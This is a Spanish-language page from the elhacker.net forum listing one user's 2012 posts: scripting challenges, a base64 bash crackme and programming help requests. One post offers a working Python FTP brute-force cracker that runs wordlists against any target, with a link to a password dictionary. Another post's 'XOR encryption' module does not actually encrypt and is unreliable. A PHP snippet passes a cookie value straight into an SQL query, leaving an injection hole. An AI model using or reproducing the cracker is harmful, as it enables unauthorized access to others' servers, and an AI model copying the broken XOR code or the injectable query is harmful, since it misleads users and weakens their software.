elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


  Mostrar Temas
Páginas: [1] 2 3 4
1  Programación / Scripting / Xor des/encrypt python en: 21 Mayo 2012, 15:27 pm
Buenas compañeros :).

Estaba buscando alguna forma de cifrar un binario mediante Xor en Python y no he encontrado ninguna forma ( no sé si la habrá, puede ser que si ), el caso es que he preferido crearme yo un módulo propio por si acaso lo tengo que utilizar más veces.

Os dejo aquí el código, por si alguna vez lo necesitáis no tenéis más que buscar por el foro :).

Código
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. # Modulo des/encriptacion clave Xor.
  4.  
  5. def xor_dencrypt(informacion,clave):
  6. encrypted = ""
  7. x = 0
  8. if (len(informacion) == len(clave)):
  9. while (x<len(informacion)):
  10. if (informacion[x] == clave[x]):
  11. encrypted = encrypted + str(0)
  12. else:
  13. encrypted = encrypted + str(1)
  14. x += 1
  15. else:
  16. print "La longitud de la clave no coincide con la informacion a cifrar"
  17. return encrypted
  18.  


Para poder llamarlo únicamente importáis el módulo como cualquier otro y llamáis a la función xor_dencrypt, enviándole como parámetros la información a cifrar y la clave.

Para descifrar no he hecho ninguna función porque es únicamente un cifrado de la información ya cifrada, así que no vale la pena :)

Un saludo, Runex.


2  Programación / Bases de Datos / Consulta Truncate en: 20 Mayo 2012, 02:53 am
Buenas compañeros, no sé que me ha pasado pero se me ha ido de la cabeza la forma de usar truncate xD.

El caso es que para vaciar un usuario en concreto de una tabla de usuarios, si no recuerdo mal, utilizaba:

Código
  1. TRUNCATE TABLE usuarios WHERE nombre="usuario";

Sin embargo esto me lanza el típico error:

#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where nombre="usuario"' at line 1

Y claro a éstas horas es difícil ya pensar, además buscando en google no he encontrado ningún caso en el que se utilice truncate con la condición where.

¿ Como se realizaría esa consulta ?.

Ya sé que también puedo vaciar el registro con
Código
  1. UPDATE usuarios SET xxx=xxx WHERE nombre="usuario";
pero tengo la espina clavada del truncate xD.

Un saludo, Runex :)
3  Programación / Scripting / BruteForce Ftp Python en: 17 Mayo 2012, 00:49 am
Buenas compañeros, estaba haciendo un bruteforce ftp con python, pero tengo un par de problemas, uno de los cuales es la velocidad y otro el límite establecido de logueos fallidos. ¿ Alguna Idea ?

EDIT: Por lo visto el problema de la velocidad solo se da en algunos servers, en servidores que no tienen límite de intentos fallidos, funciona perfectamente :).
Resuelto el problema de los límites de fallos :)

Aquí os dejo el link con un diccionario de 3mb en texto plano ( hay bastantes :D), utilizad el mismo diccionario para los usuarios y los passwords, solo tenéis que hacer una copia y renombrarla a passwords.txt: https://rapidshare.com/files/4215115057/usuarios.txt

Tened en cuenta también que en los ftp públicos toda cuenta que tenga como user "anonymous" es válida xD.

Si os interesa que le aplique interfaz gráfica decidmelo :).

Este es el código:

Código
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. import ftplib
  4.  
  5. class ftp_brute_force:
  6. def __init__(self,conectftp,target):
  7. self.listausuarios,self.listapasswords,self.conectftp,self.target,self.contadorus,self.contadorpas = ([],[],conectftp,target,0,0)
  8. print "\n[+] Cargando los diccionarios,esto puede tardar unos segundos... [+]"
  9. try:
  10. self.users = open("usuarios.txt","r")
  11. self.passwords = open("passwords.txt","r")
  12. except:
  13. print "\n [-] No existen los diccionarios"
  14. exit()
  15. for self.user in self.users.readlines():
  16. self.listausuarios.append(self.user)
  17. self.contadorus += 1
  18. for self.password in self.passwords.readlines():
  19. self.listapasswords.append(self.password)
  20. self.contadorpas += 1
  21. self.users.close()
  22. self.passwords.close()
  23. print "\n[+] Diccionarios Cargados: " + str(self.contadorus) + " Usuarios y " + str(self.contadorpas) + " Passwords [+]"
  24. print "\n[+] Combinaciones posibles: " + str(self.contadorus*self.contadorpas) +" [+]"
  25. print "\n[+] Ataque iniciado,puede llevar bastante tiempo, no cierre el programa [+]\n\n"
  26. self.bruteforce()
  27. def bruteforce(self):
  28. for self.user in self.listausuarios:
  29. for self.password in self.listapasswords:
  30. try:
  31. self.conectftp.login(self.user,self.password)
  32. print "Los datos son --> " + self.user + " y " + self.password
  33. self.conectftp.quit()
  34. self.conectftp.close()
  35. self.conectftp = ftplib.FTP(self.target)
  36. raw_input()
  37. except:
  38. print self.user + " y " + self.password + " no son correctos"
  39. self.conectftp.quit()
  40. self.conectftp.close()
  41. self.conectftp = ftplib.FTP(self.target)
  42.  
  43. print " [-] No se han podido extraer datos."
  44.  
  45. if __name__ == '__main__':
  46. print " [+]   FTP CRACKER BY RUNE   [+]\n\n\n"
  47. target = raw_input("\n\nIntroduce el target [+] > ")
  48. try:
  49. conectftp = ftplib.FTP(target)
  50. except:
  51. print " \n[-] No existe el target"
  52. exit()
  53. instancia = ftp_brute_force(conectftp,target)
  54.  
  55.  
  56.  

Por cierto, para amenizar la impresión por pantalla quería hacer tipo un contador que vaya subiendo por cada usuario y contraseña probado, sin que cambie de posición en pantalla, que se vaya actualizando, algo así:

0/10000 y que cuando pruebe 1 cambie a 1/10000 sin imprimirse en otra linea.

¿ Se os ocurre algo ?

Eso es todo compañeros, espero vuestra ayuda, un saludo, Runex :)
4  Sistemas Operativos / GNU/Linux / Problema Xulrunner en: 14 Mayo 2012, 13:38 pm
No sé por qué motivo no me deja instalar xulrunner para poder correr websecurify. El error que me lanza es éste:


El paquete xulrunner-2.0 no está disponible, pero algún otro paquete hace referencia
a él. Esto puede significar que el paquete falta, está obsoleto o sólo se
encuentra disponible desde alguna otra fuente

E: El paquete «xulrunner-2.0» no tiene un candidato para la instalación


Alguna idea? :)
5  Programación / Scripting / [Reto Bash] It's a dir? en: 12 Mayo 2012, 17:28 pm
Es el mismo reto que el planteado por EleKtro pero en bash, así que dificultad ninguna :).

Nombre:      It's a dir?
Dificultad:     2/10
Objetivo:      Diferenciar entre directorios y archivos
Indicaciones:
Ejemplo:    

Solución: http://pastebin.com/Z6WTYpAS

Solucionado:

1-> Leo Gutiérrez
6  Programación / Scripting / [Reto Bash] Generar x aleatorios y calcular el tiempo de ejecución. en: 10 Mayo 2012, 20:40 pm
Nombre:      Generador
Dificultad:     2/10
Objetivo:      Calcular el tiempo de generación.
Indicaciones: El mensaje de salida debe indicar la cantidad de números generados.
Pistas:    Tampoco :)

Ejemplo:

7  Programación / Scripting / [Reto Bash] Crackme 1 en: 10 Mayo 2012, 18:50 pm
El primer crackme que inicia los retos Bash  ;-)
Es muy simple y aquí teneis las indicaciones:


Nombre:      Crackme Rune
Dificultad:     3/10
Objetivo:      Loguearse.
Indicaciones: Ninguna, es muy simple :)
Pistas:    Al final del code, está vuestra pista :)

Código
  1. IyEvYmluL2Jhc2gKZWNobyAnSW5zZXJ0ZSBlbCB1c3VhcmlvJwpyZWFkIEEKeDU9NjUKeDY9NDUK
  2. eDc9MzQKcD0keDYkeDckeDUKaWYgWyAkQSAhPSAkcCBdCnRoZW4KZWNobyAnTWFsJwpzbGVlcCAz
  3. cwplbHNlCmVjaG8gJ1VzdWFyaW8gQ29ycmVjdG8nCmVjaG8gJ0EgY29udGludWFjaW9uIGluc2Vy
  4. dGUgbGEgY29udHJhc2XDsWEnCngxPTEKeDI9NAp4Mz01Ngp4ND0yMwp4PSR4MSR4MyR4MiR4NApy
  5. ZWFkIHBhc3MKaWYgWyAkcGFzcyA9ICR4IF0gCnRoZW4KZWNobyAnQ29udHJhc2XDsWEgY29ycmVj
  6. dGEsIGFjY2VkaWVuZG8gYWwgcGFuZWwnCnNsZWVwIDRzCmV4aXQgMAplbHNlCmVjaG8gJ0NvbnRy
  7. YXNlw7FhIGluY29ycmVjdGEnCnNsZWVwIDRzCmV4aXQKZmkKZmkKCg==

Completados:

1->RyogiShiki
8  Programación / Scripting / Retos Bash y Python en: 10 Mayo 2012, 17:56 pm
Bueno, últimamente se han puesto de moda por el foro los retos Batch, así que no estaría mal que se viesen por aquí, retos en distintos lenguajes scripting.

Así, para gozar de una buena organización y orden , seguiremos el mismo esquema planteado por mi compañero EleKtro H@cker

Formato para publicar un reto:

Citar
* Reto:             (Tú Nombre)
* Dificultad:      (X/10)
* Objetivo:        (Objetivo del reto)
  Indicaciones: (Indicaciones especiales, Si fuese necesario.)
  Pistas:            (S quieren dar pistas...)
  Ejemplo:         (Un código o una imagen de ejemplo para dar una pista, O para indicar un método NO ACEPTADO para realizar el reto.)

* Solo es obligatorio rellenar los campos marcados con un asterisco.

Formato para publicar un crackme:

Citar
* Crackme:     (Tú Nombre)
* Dificultad:     (X/10)
* Objetivo:       (Objetivo del crackme)
  Indicaciones: (Indicaciones especiales, Si fuese necesario.)
  Pistas:           (S quieren dar pistas...)

* Código:

Código
  1. echo "xxxxxxx"
  2. ...
  3. ...
  4.  

* Solo es obligatorio rellenar los campos marcados con un asterisco.

Las normas, las podéis encontrar en el post de EleKtro:

http://foro.elhacker.net/scripting/iquestquieren_retos_de_batch-t360401.0.html

Eso es todo y un saludo :)
9  Programación / PHP / Condicional defectuoso en: 9 Mayo 2012, 15:47 pm
El código es el siguiente:

Código
  1. <?php
  2. if(isset($_POST["usuariox"]) and isset($_POST["passwordx"]))
  3. {
  4. if($_POST['usuariox'] == "neo" and $_POST['passwordx'] == "matrixrevolution")
  5. {
  6. ?>
  7. <script type="text/javascript">
  8. alert("Todo correcto, reto superado")
  9. </script>
  10. <META HTTP-EQUIV="REFRESH" CONTENT="0;URL="****">
  11. <?php
  12. $usuario = $_COOKIE['Usuario'];
  13. $conect = mysql_connect("***","****","***") or die("Problemas en la db");
  14. mysql_select_db("***") or die("Problemas en a tablaa");
  15. $consulta = mysql_query("update usuarios set superados = superados + 1 where nombre='$usuario'") or die("Problemas en la consulta");
  16. }
  17. else
  18. {
  19. ?>
  20. <script type="text/javascript">
  21. alert("Respuesta Incorrecta")
  22. </script>
  23. <?php
  24. }
  25. }
  26. } // Esta llave viene de un if, que hay más arriba del código para la comprobación de las cookies.
  27. else
  28. {
  29. ?>
  30. <script type="text/javascript" >
  31. alert("Tienes que estar registrado!");
  32. </script>
  33. <META HTTP-EQUIV="REFRESH" CONTENT="0;URL=***">
  34. <?php
  35. }

No sé porque pero siempre me da como superado el reto, por mucho que inserte datos erróneos :S. Os agradecería que me aviséis si encontráis algún fallo lógico, error o cualquier cosa que pueda ocasionar el problema.

Podéis cerrar el tema, ya está corregido :)
Un saludo
10  Programación / Desarrollo Web / Pie de Pagina HTML en: 8 Mayo 2012, 18:30 pm
Buenas compañeros, estaba acabando mi web y me interesaba ponerle un pie de página, el problema es que no sé css y no lo voy a utilizar para nada más que para esta situación, de momento claro. ¿Necesito css obligatorio para establecer una imágen fija como pie de página? o ¿Hay alguna solución con html?. En caso de que sepáis como co**** se puede hacer esto, os pido una ayudita :).


Un saludo compañeros :)
Páginas: [1] 2 3 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines